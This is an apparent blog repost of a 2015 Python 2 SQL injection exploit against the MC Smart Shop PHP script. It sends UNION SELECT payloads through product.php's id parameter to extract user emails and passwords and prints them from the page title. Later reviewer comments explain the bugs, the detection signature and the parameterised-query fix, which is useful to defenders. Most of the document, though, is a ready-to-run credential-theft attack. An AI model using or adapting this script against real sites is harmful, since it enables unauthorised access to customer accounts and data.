28 Mayıs 2015 Perşembe

MC Smart Shop <- (product.php id) SQL Injection Exploit

# Discovered by : Septemb0x
|~App. : MC Smart Shop
|~Vendor Homepage: http://microcode.ws/
|~Official Demo : http://microcode.ws/demo/smartshop/
|~Sales Link: http://codecanyon.net/item/mc-smart-shop/11555914
|~Date : "28.05.2015"
|~Greetz: _UnDeRTaKeR_, BARCOD3, KnocKout / http://milw00rm.com

##############################################################
                              ( http://pastebin.com/exR0cJw2 )
###############################################################
#!/usr/bin/env python

# Exploit Title: MC Smart Shop (product.php id) SQL Injection Exploit
# Date: 28/05/2015
# Exploit Author: Septemb0x
# Vendor Homepage: http://microcode.ws/
# Software Link: http://microcode.ws/demo/smartshop/
# Version: 1.0
# Thanks: _UnDeRTaKeR_, BARCOD3, KnocKout

import sys, urllib2, re, os, time
   
# Python 2 script (print statements, urllib2). Expects exactly one positional
# argument, the base URL of the shop install; without it, print the usage
# banner and exit with status 1.
if len(sys.argv) < 2:
    # NOTE(review): ['clear','cls'][1] always evaluates to 'cls' (the Windows
    # command) regardless of platform, so on Unix this only emits a shell error.
    os.system(['clear','cls'][1])
    print " ____________________________________________________________________"
    print "|                                                                    |"
    print "|   MC Smart Shop (product.php id) SQL Injection Exploit             |"
    print "|   Septemb0x / Cyber-Warrior.Org                                    |"
    print "|   exploit.py http://[target]/path/                                 |"
    print "|____________________________________________________________________|"
    sys.exit(1)

# Normalise the target URL: guarantee a trailing slash and an "http://" prefix.
addhttp = "http://"
addslash = "/"
url = sys.argv[1]

if url[-1:] != addslash:
    url += addslash

# NOTE(review): this is a literal prefix comparison, so an "https://" URL is
# not recognised and gets "http://" prepended -- only plain http is handled.
if url[:7]  != addhttp:
    url =  addhttp + url

# The endpoint named in the advisory: product.php takes an `id` query
# parameter which, per the title of this report, reaches a SQL statement
# without validation or parameterisation. Binding `id` as a query parameter
# (and rejecting non-numeric ids) is the fix on the application side.
exploitfile = "product.php"

# Two UNION-based payloads, differing only in the column selected from
# `users` (email, then password). `id=-1` empties the legitimate result set
# and the 16-value UNION SELECT (0, <column>, 2 .. 15) places the chosen
# column at position 1, which is presumably rendered into the page <title>
# that the regex below scrapes -- confirm against product.php's template.
# For detection: the url-encoded "%20union%20select%20" inside the `id`
# parameter of a product.php request is the log/WAF signature of this probe.
getusername = "?id=-1%20union%20select%200,email,2,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20users"
getpassword = "?id=-1%20union%20select%200,password,2,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20users"

targetu = url + exploitfile + getusername
targetp = url + exploitfile + getpassword



print "\nExploiting...\n"

# First request: fetch the page and scrape the <title> for the injected value.
try:
    data = urllib2.urlopen(targetu).read()
    # Greedy three-group match that requires at least one hex digit somewhere
    # in the title; the groups are simply re-joined on output, so effectively
    # the whole <title> text is printed.
    getdata = re.findall(r"<title>(.*)([0-9a-fA-F])(.*)</title>", data)
    if len(getdata) > 0:
        print "UserName:  " + getdata[0][0] + getdata[0][1] +getdata[0][2]
    else:
        print "Exploit failed..."


# Only HTTP error statuses are caught; a connection or DNS failure raises
# urllib2.URLError, which is not handled and escapes as a traceback.
except urllib2.HTTPError:
    print "Access Denied!"


# Second request: identical flow against the `password` payload. Whether the
# printed value is a hash or plaintext depends on how the application stores
# it, which this script does not reveal.
try:
    data = urllib2.urlopen(targetp).read()
    getdata = re.findall(r"<title>(.*)([0-9a-fA-F])(.*)</title>", data)
    if len(getdata) > 0:
        print "PassWord:  " + getdata[0][0] + getdata[0][1] +getdata[0][2]

        print "\nSuccessful Exploit!"
    else:
        print "Exploit failed..."


# Same handler as above: only HTTPError is caught.
except urllib2.HTTPError:
    print "Access Denied!"
